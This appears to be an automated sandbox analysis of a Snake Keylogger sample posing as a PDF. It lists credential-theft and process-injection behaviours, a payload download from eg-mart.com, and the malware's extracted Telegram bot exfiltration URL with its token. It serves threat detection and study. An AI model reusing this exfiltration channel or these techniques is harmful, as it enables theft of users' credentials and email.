snakekeylogger | 0a9ecd688ef796b210e188f80088291b9d8dcfd820f80f5e2cb5d25bca8d159d

Analysis

max time kernel
118s
max time network
206s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
25/09/2024, 08:46 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Products List.pdf.scr
Size

40KB
MD5

4e783011f451168c8c75229518d350a6
SHA1

be7e0c5f52d8ca1ebffadf27816d4f06adcf5567
SHA256

86ea9ea45a530191cb5f42b3336b00cfb92dd219f0861e5dc9dac7f5d1e48232
SHA512

dd66bb38ae4117190eacb0bab5ddab5eee9b1c8c927271186ce3028d04ec4a8fe22cf68b33ff1f98179dc7a9be9187df9074276a849ef805eb94937140cc0e69
SSDEEP

768:S8T7EgqeXx/Q+c3cUgTo0cNHqvRe5AmNPseYbfdleI:D/EVeXKiUgbRSNUeUleI

Score

10^/10

snakekeylogger collection discovery keylogger spyware stealer

Malware Config

Extracted

Family

snakekeylogger

https://api.telegram.org/bot7541020039:AAGsq8h1YFdFZMkWR4YvtTV1a-gYO_XOaR4/sendMessage?chat_id=5593200404

Signatures

Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger

Snake Keylogger payload 1 IoCs

resource	yara_rule
behavioral2/memory/2068-1094-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2336 created 3464	2336	Products List.pdf.scr	55

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
25	checkip.dyndns.org

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2336 set thread context of 2068	2336	Products List.pdf.scr	87

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Products List.pdf.scr
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2336	Products List.pdf.scr
2068	RegAsm.exe
2068	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2336	Products List.pdf.scr
Token: SeDebugPrivilege	2336	Products List.pdf.scr
Token: SeDebugPrivilege	2068	RegAsm.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2336 wrote to memory of 2068	2336	Products List.pdf.scr	87
PID 2336 wrote to memory of 2068	2336	Products List.pdf.scr	87
PID 2336 wrote to memory of 2068	2336	Products List.pdf.scr	87
PID 2336 wrote to memory of 2068	2336	Products List.pdf.scr	87
PID 2336 wrote to memory of 2068	2336	Products List.pdf.scr	87
PID 2336 wrote to memory of 2068	2336	Products List.pdf.scr	87
PID 2336 wrote to memory of 2068	2336	Products List.pdf.scr	87
PID 2336 wrote to memory of 2068	2336	Products List.pdf.scr	87

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3464
- C:\Users\Admin\AppData\Local\Temp\Products List.pdf.scr
  "C:\Users\Admin\AppData\Local\Temp\Products List.pdf.scr" /S
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2336
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  - Accesses Microsoft Outlook profiles
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - outlook_office_path
  - outlook_win_path
  PID:2068

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

bing.com

Products List.pdf.scr

Remote address:

8.8.8.8:53

Request

bing.com

IN A

Response

bing.com

IN A

13.107.21.200

bing.com

IN A

204.79.197.200
DNS

eg-mart.com

Products List.pdf.scr

Remote address:

8.8.8.8:53

Request

eg-mart.com

IN A

Response

eg-mart.com

IN A

135.181.160.46
GET

https://eg-mart.com/Rrhwxiloul.pdf

Products List.pdf.scr

Remote address:

135.181.160.46:443

Request

GET /Rrhwxiloul.pdf HTTP/1.1
Host: eg-mart.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 25 Sep 2024 08:46:55 GMT
Content-Type: application/pdf
Content-Length: 915976
Connection: keep-alive
Last-Modified: Tue, 24 Sep 2024 23:21:35 GMT
Accept-Ranges: bytes
DNS

13.86.106.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.86.106.20.in-addr.arpa

IN PTR

Response
DNS

46.160.181.135.in-addr.arpa

Remote address:

8.8.8.8:53

Request

46.160.181.135.in-addr.arpa

IN PTR

Response

46.160.181.135.in-addr.arpa

IN PTR

server5 virgo-hostcom
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

73.31.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

73.31.126.40.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

28.118.140.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.118.140.52.in-addr.arpa

IN PTR

Response
DNS

checkip.dyndns.org

RegAsm.exe

Remote address:

8.8.8.8:53

Request

checkip.dyndns.org

IN A

Response

checkip.dyndns.org

IN CNAME

checkip.dyndns.com

checkip.dyndns.com

IN A

193.122.130.0

checkip.dyndns.com

IN A

158.101.44.242

checkip.dyndns.com

IN A

132.226.8.169

checkip.dyndns.com

IN A

193.122.6.168

checkip.dyndns.com

IN A

132.226.247.73
GET

http://checkip.dyndns.org/

RegAsm.exe

Remote address:

193.122.130.0:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 08:47:11 GMT
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 9e5db6b050734c8dd4353b5cdddf776d
GET

http://checkip.dyndns.org/

RegAsm.exe

Remote address:

193.122.130.0:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 08:47:11 GMT
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: df9cf8e6247b66fca2cc6cdb02820141
GET

http://checkip.dyndns.org/

RegAsm.exe

Remote address:

193.122.130.0:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 08:47:12 GMT
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 0378722fbb53dcb13f3e6d1dc1e2fa59
GET

http://checkip.dyndns.org/

RegAsm.exe

Remote address:

193.122.130.0:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 08:47:12 GMT
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: dfb08e1d8f032d8d5fede693f5cb56f3
GET

http://checkip.dyndns.org/

RegAsm.exe

Remote address:

193.122.130.0:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 08:47:12 GMT
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: a10f85e2d76b0b28a49826f2d12f74ab
GET

http://checkip.dyndns.org/

RegAsm.exe

Remote address:

193.122.130.0:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 08:47:12 GMT
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 7d9f2a005356192245317c69540306eb
GET

http://checkip.dyndns.org/

RegAsm.exe

Remote address:

193.122.130.0:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 08:47:12 GMT
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 4a3de010aec5cc68c5f30d01583fa987
GET

http://checkip.dyndns.org/

RegAsm.exe

Remote address:

193.122.130.0:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 08:47:12 GMT
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: a0c66fae24627c08ac0e9331e1301170
GET

http://checkip.dyndns.org/

RegAsm.exe

Remote address:

193.122.130.0:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 08:47:13 GMT
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 2c17f5e33b04180146dcf19d63d4d0d9
DNS

reallyfreegeoip.org

RegAsm.exe

Remote address:

8.8.8.8:53

Request

reallyfreegeoip.org

IN A

Response

reallyfreegeoip.org

IN A

104.21.67.152

reallyfreegeoip.org

IN A

172.67.177.134
GET

https://reallyfreegeoip.org/xml/138.199.29.44

RegAsm.exe

Remote address:

104.21.67.152:443

Request

GET /xml/138.199.29.44 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 08:47:12 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 67679
Last-Modified: Tue, 24 Sep 2024 13:59:13 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gq6Z0JsRcJpEPBp1PsyCxl5tzBN%2BWzmo45dwNLLSYHnOviN2HO1lCXgpqxyxFYLKxRgtBbjjDXjSyrGzOe%2Bc6V%2B86Wgyc3mlLhEtQZMjEfybmPjsoF1RLN9b%2BO8%2F81CgwlMrbxm5"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c89bf84290f652b-LHR
GET

https://reallyfreegeoip.org/xml/138.199.29.44

RegAsm.exe

Remote address:

104.21.67.152:443

Request

GET /xml/138.199.29.44 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 08:47:12 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 67679
Last-Modified: Tue, 24 Sep 2024 13:59:13 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BdvrOpm70ejf4ITN53UxxNDznVGBY0i4%2FzRGzeeqAgeyA2rBd9LIe3GPpLtT48I8XRsqifipAceEyDPCjxOdKRl7XDMKwxdYrDL6tEs9u76QaMkcu5uF1TSSryQcB%2FMPdIaJoh5j"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c89bf852a33652b-LHR
GET

https://reallyfreegeoip.org/xml/138.199.29.44

RegAsm.exe

Remote address:

104.21.67.152:443

Request

GET /xml/138.199.29.44 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 08:47:12 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 67679
Last-Modified: Tue, 24 Sep 2024 13:59:13 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FWFRginVfzN%2FX%2Fx7KMqo%2BsP8INM2FDpVirbfv%2BVFVQjL%2FDRPVGElEqoDWZMPn%2B35PE3mWLFtotHDpgTAiE%2F8lYNAjoog1TWA9FdQvm%2BMzCWp1WWYsGYTwb1uqxU6m9jF9akM1%2Bvz"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c89bf862b43652b-LHR
GET

https://reallyfreegeoip.org/xml/138.199.29.44

RegAsm.exe

Remote address:

104.21.67.152:443

Request

GET /xml/138.199.29.44 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 08:47:12 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 67679
Last-Modified: Tue, 24 Sep 2024 13:59:13 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=najUzTabwnm2df%2FGtdK7TRFUzF2Oy1JrhqDym8yEtbAImObH8mZpC98%2BMryhZYSIEuDF4qK0XFrTZ0JQxgat457zyuaSf0DNcVFvRMzyx%2Bn7aui6JiEIGu%2FV0TYLNu42gZECLY3L"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c89bf870c9a652b-LHR
GET

https://reallyfreegeoip.org/xml/138.199.29.44

RegAsm.exe

Remote address:

104.21.67.152:443

Request

GET /xml/138.199.29.44 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 08:47:12 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 67679
Last-Modified: Tue, 24 Sep 2024 13:59:13 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FOtFolqqlLxbtP3yc%2FX%2FMOhLxpzGfRrcYT8gtO9IhYdIkBal3ukPbLy4StnCqusQPSsDxq1mdogOInSo2JCMPw7J1Dc4s%2Ffq%2Foi8hrufPuE%2B1YOxa7QphE4ferpEuZaAGWpLTUJp"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c89bf880dd9652b-LHR
GET

https://reallyfreegeoip.org/xml/138.199.29.44

RegAsm.exe

Remote address:

104.21.67.152:443

Request

GET /xml/138.199.29.44 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 08:47:12 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 67679
Last-Modified: Tue, 24 Sep 2024 13:59:13 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tNKDG%2FhEjulNanHrZA7ImuYazi1WJxQ4woV8xkPAwLDLX2wlgm9yt0fMS0zcK07YI3FtopSE628t%2FvOix5UO1zEr6GckAhsISBKJWCCWLoynUZoGOr12%2Bs7urYFUlk8lVSunBO6L"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c89bf88ef52652b-LHR
GET

https://reallyfreegeoip.org/xml/138.199.29.44

RegAsm.exe

Remote address:

104.21.67.152:443

Request

GET /xml/138.199.29.44 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 08:47:12 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 67679
Last-Modified: Tue, 24 Sep 2024 13:59:13 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1lLth9XdDyM2k8c4ytHAnau9hdvKDTduEu5jjyk5oN7ROK3rGh4yw8X898rG4IqrCWTXceKOeAesSmnDdBxAxHnrtcAs5xV6rmmbwuCF8ojrQxe3UCXoAHx5D8WlBvMJpAGHMxub"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c89bf89d871652b-LHR
GET

https://reallyfreegeoip.org/xml/138.199.29.44

RegAsm.exe

Remote address:

104.21.67.152:443

Request

GET /xml/138.199.29.44 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 08:47:13 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 67680
Last-Modified: Tue, 24 Sep 2024 13:59:13 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7eNXgT4LKBE4Ii4xod%2F65zqxooaMW0HW2aK3631YMFkCGHlC5vpNqIiPuQ%2Bjx4mKmlGoq%2Fd7LTsRfcD1dvNIaEYGSQxvQiFilm%2BDt9sGfElQqn6zlrcShJgzyWAM9%2B6HKL10ypH%2F"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c89bf8ab992652b-LHR
DNS

0.130.122.193.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.130.122.193.in-addr.arpa

IN PTR

Response
DNS

152.67.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

152.67.21.104.in-addr.arpa

IN PTR

Response
DNS

241.150.49.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.150.49.20.in-addr.arpa

IN PTR

Response
DNS

86.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

86.23.85.13.in-addr.arpa

IN PTR

Response
DNS

171.39.242.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.39.242.20.in-addr.arpa

IN PTR

Response

135.181.160.46:443

https://eg-mart.com/Rrhwxiloul.pdf

tls, http

Products List.pdf.scr

23.6kB
948.4kB
460
683

HTTP Request

GET https://eg-mart.com/Rrhwxiloul.pdf

HTTP Response

200
193.122.130.0:80

http://checkip.dyndns.org/

http

RegAsm.exe

1.9kB
3.4kB
16
13

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200
104.21.67.152:443

https://reallyfreegeoip.org/xml/138.199.29.44

tls, http

RegAsm.exe

2.0kB
12.4kB
23
23

HTTP Request

GET https://reallyfreegeoip.org/xml/138.199.29.44

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/138.199.29.44

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/138.199.29.44

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/138.199.29.44

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/138.199.29.44

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/138.199.29.44

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/138.199.29.44

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/138.199.29.44

HTTP Response

200

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

bing.com

dns

Products List.pdf.scr

54 B
86 B
1
1

DNS Request

bing.com

DNS Response

13.107.21.200

204.79.197.200
8.8.8.8:53

eg-mart.com

dns

Products List.pdf.scr

57 B
73 B
1
1

DNS Request

eg-mart.com

DNS Response

135.181.160.46
8.8.8.8:53

13.86.106.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

13.86.106.20.in-addr.arpa
8.8.8.8:53

46.160.181.135.in-addr.arpa

dns

73 B
109 B
1
1

DNS Request

46.160.181.135.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

73.31.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

73.31.126.40.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

28.118.140.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

28.118.140.52.in-addr.arpa
8.8.8.8:53

checkip.dyndns.org

dns

RegAsm.exe

64 B
176 B
1
1

DNS Request

checkip.dyndns.org

DNS Response

193.122.130.0

158.101.44.242

132.226.8.169

193.122.6.168

132.226.247.73
8.8.8.8:53

reallyfreegeoip.org

dns

RegAsm.exe

65 B
97 B
1
1

DNS Request

reallyfreegeoip.org

DNS Response

104.21.67.152

172.67.177.134
8.8.8.8:53

0.130.122.193.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

0.130.122.193.in-addr.arpa
8.8.8.8:53

152.67.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

152.67.21.104.in-addr.arpa
8.8.8.8:53

241.150.49.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

241.150.49.20.in-addr.arpa
8.8.8.8:53

86.23.85.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

86.23.85.13.in-addr.arpa
8.8.8.8:53

171.39.242.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

171.39.242.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2068-1093-0x0000000074EB0000-0x0000000075660000-memory.dmp

Filesize
7.7MB

Download
memory/2068-1094-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/2068-1095-0x0000000005360000-0x00000000053FC000-memory.dmp

Filesize
624KB

Download
memory/2068-1096-0x0000000074EB0000-0x0000000075660000-memory.dmp

Filesize
7.7MB

Download
memory/2068-1097-0x00000000064F0000-0x0000000006540000-memory.dmp

Filesize
320KB

Download
memory/2068-1101-0x0000000074EB0000-0x0000000075660000-memory.dmp

Filesize
7.7MB

Download
memory/2068-1100-0x0000000006590000-0x000000000659A000-memory.dmp

Filesize
40KB

Download
memory/2068-1099-0x00000000065E0000-0x0000000006672000-memory.dmp

Filesize
584KB

Download
memory/2068-1098-0x0000000006710000-0x00000000068D2000-memory.dmp

Filesize
1.8MB

Download
memory/2336-31-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-21-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-57-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-67-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-65-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-63-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-61-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-59-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-55-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-53-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-51-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-49-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-47-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-45-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-41-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-39-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-37-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-35-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-33-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-19-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-29-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-27-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-25-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-23-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-17-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-15-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-13-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-12-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
memory/2336-9-0x0000000006450000-0x0000000006530000-memory.dmp

Filesize
896KB

Download
